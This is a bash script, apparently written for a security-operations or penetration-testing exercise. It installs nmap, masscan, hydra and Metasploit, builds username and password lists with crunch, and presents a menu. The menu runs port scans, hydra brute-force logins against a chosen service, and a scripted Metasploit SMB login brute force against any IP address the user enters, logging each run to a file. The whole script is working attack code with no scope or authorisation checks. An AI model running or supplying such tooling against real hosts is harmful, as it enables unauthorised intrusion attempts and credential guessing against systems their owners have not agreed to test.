#!/bin/bash 

#Function for the updating and upgrading the user's machine and also install scanning and attacking software
function inst (){
	
#Fast update system before installing necessary scanning and attack tools
sudo apt update -y

#Upgrade the user's machine to the latest available version 
#sudo apt upgrade -y

#Install nmap a network scanner to detect hosts and services available on the local area network
#Nmap can be used by hackers to detect uncontrolled ports on a system
#Credits: Information for nmap installation and usage - https://www.kali.org/tools/nmap/
sudo apt-get install nmap -y

#Install masscan is a network port scanner similar in application to nmap but fast and able to scan in stealth
#Credits: Information for masscan installation and usage - https://github.com/robertdavidgraham/masscan
sudo apt-get install masscan -y

#Install hydra an open source tool to conduct various kind of brute force attacks 
#A login cracker which supports various protocols such as ftp ,ssh rdp etc 
#Credits: Information for hydra installation  - https://www.kali.org/tools/hydra/
sudo apt install hydra -y

#Install metasploit framework which will help the user later to probe a particular vulneranility which will be explained further in option -d of the function scanattacker
#Credits: Information on metasploit installation - https://www.fosslinux.com/48112/install-metasploit-kali-linux.htm
sudo apt-get install metasploit-framework -y

#Utilise crunch which comes in preinstalled with Kali Linux to generate lists
#Create a list of users which are needed for some attacks
crunch 4 4 abcdefghijklmnopqrstuvwx > user.lst
#Create a list of paswords which are needed for some attacks
crunch 4 4 abcde > password.lst
}

#A function which allows the user to conduct nmap and masscans , and also carry out hydra and msfconsole smb brute force attacks
function scanattacker()
{

#Display all the options users can run
read -p "Would you like to a) Run a nmap scan b) Run a masscan c) Run a hydra attack  d) mfsconsole e) exit : " choices 

case $choices in 
	
	a)	#User chooses option a
		#User needs to enter the the target ip address they would like to do nmap scan
		echo 'Enter ip address to do a nmap'
		#Read ipaddress provided by user and store it in a variable
		read ip_addr
		echo "$ip_addr"
		
		#Conduct a namp scan on 1001 ports on the ipaddress provided by the user
		#The scan reuslts are kept in the nmap_scanresults text file which
		#Result file can be found in the same working directory where this script is run
		sudo nmap -p0-1000 $ip_addr >>nmap_scanresults.txt
		
		#Check if the nmap command has been executed succesfully. 
		#If executed successfully then it will be recorded as such in the socchecker log (txt) file
		#If the command failed it will also record it within the socchecker log (txt) file 
		#socchecker file acts as a log file where all scans and attacks are logged in with their execution status
		if [ $? -eq 0 ]; then
			echo `date` "sudo nmap -p0-1000 $ip_addr Executed" >>socchecker.txt
		else
			echo `date` "sudo nmap -p0-1000 $ip_addr Failed" >>socchecker.txt
		fi
		
		#Call the function again so that user can utlise other scans or attacks
		scanattacker
	;;
	
	b) 	#User chooses option b
		#User needs to enter the the target ip address they would like to do masscan
		echo 'Enter ip address to do a masscan'
		#Read ipaddress provided by user and store it in a variable
		read ip_addr
		echo "$ip_addr"
		
		#Conduct a masscan on 1001 ports on the ipaddress provided by the user
		#The scan reuslts are kept in the masscan_scanresults text file which
		#Result file can be found in the same working directory where this script is run
		sudo masscan $ip_addr -p 0-1000 --rate=10000 >>masscan_scanresults.txt
		
		#Check if the masscan command has been executed succesfully. 
		#If executed successfully then it will be recorded as such in the socchecker log (txt) file
		#If the command failed it will also record it within the socchecker log (txt) file 
		if [ $? -eq 0 ]; then
			echo `date` "sudo masscan $ip_addr -p 0-1000 --rate=10000 Executed" >>socchecker.txt
		else
			echo `date` "sudo masscan $ip_addr -p 0-1000 --rate=10000 Failed" >>socchecker.txt
		fi
		
		#Call the function again so that user can utlise other scans or attacks
		scanattacker
	;;
	
	c)
		#User chooses option c
		#User needs to enter the the target ip address they would like to a hydra attack 
		echo 'Enter ip address to do a hydra attack'
		#Read ipaddress provided by user and store it in a variable
		read ip_addr
		echo "$ip_addr"
		#User also has to enter the type of service they would like to brute force eg; ftp ,ssh etc
		echo 'Enter service you want to attack'
		#Read the service user wants to attack
		read ser_name
		echo "$ser_name"
		
		#Conduct a hydra attack using the user and password lists generated by crunch previously on a specific service provided by the user
		#The scan reuslts are kept in the hydra_attackresults text file which
		#Result file can be found in the same working directory where this script is run
		sudo hydra  -L ./user.lst -P ./password.lst $ip_addr $ser_name -vV >>hydra_attackresult.txt
		
		#Check if the hydra command has been executed succesfully. 
		#If executed successfully then it will be recorded as such in the socchecker log (txt) file
		#If the command failed it will also record it within the socchecker log (txt) file 
		if [ $? -eq 0 ]; then
			echo `date` "sudo hydra  -L ./user.lst -P ./password.lst $ip_addr $ser_name -vV Executed" >>socchecker.txt
		else
			echo `date` "sudo hydra  -L ./user.lst -P ./password.lst $ip_addr $ser_name -vV Failed" >>socchecker.txt
		fi
		
		#Call the function again so that user can utlise other scans or attacks
		scanattacker
	;;
	d)	#User chooses option d
		#User needs to enter the the target ip address they would like to do the Server Message Block (smb) attack 
		echo 'Enter ip address to do a msfconsole attack'
		#Read ipaddress provided by user and store it in a variable rhost_addr 
		read rhost_addr
		echo "$rhost_addr"
		#Write commands needed run on metasploit to execute the smb attack into the smb_script
		echo 'use auxiliary/scanner/smb/smb_login' > smb_script.rc
		echo "set rhosts $rhost_addr" >> smb_script.rc
		echo 'set user_file user.lst' >> smb_script.rc
		echo 'set pass_file password.lst' >> smb_script.rc
		echo 'run' >> smb_script.rc
		echo 'exit' >> smb_script.rc
		
		#Conduct a smb attack on msfconsole ( metasploit ) by reading the smb_script 
		#Credits: Executing msfconsole smb attack - https://www.offensive-security.com/metasploit-unleashed/smb-login-check/
		#The scan results are kept in the msf_smb_bf_results text file 
		#Result file can be found in the same working directory where this script is run
		sudo msfconsole -r smb_script.rc -o msf_smb_bf_results.txt
		
		#Record that the msfconsole smb was conducted after exiting from the console in the socchecker log (txt) file
		echo `date` "msfconsole run on set rhost $rhost_addr and exited from console Executed" >>socchecker.txt
		
		#Call the function again so that user can utlise other scans or attacks
		scanattacker
	;;
	
	e)
		#User chooses to exit from the program
		exit
	;;
esac
	
}

#Call the installation function for updates, upgrades and installations
inst

#Call the function which allows the user to conduct nmap and masscans ,and also carry out hydra and msfconsole smb brute force attacks
scanattacker


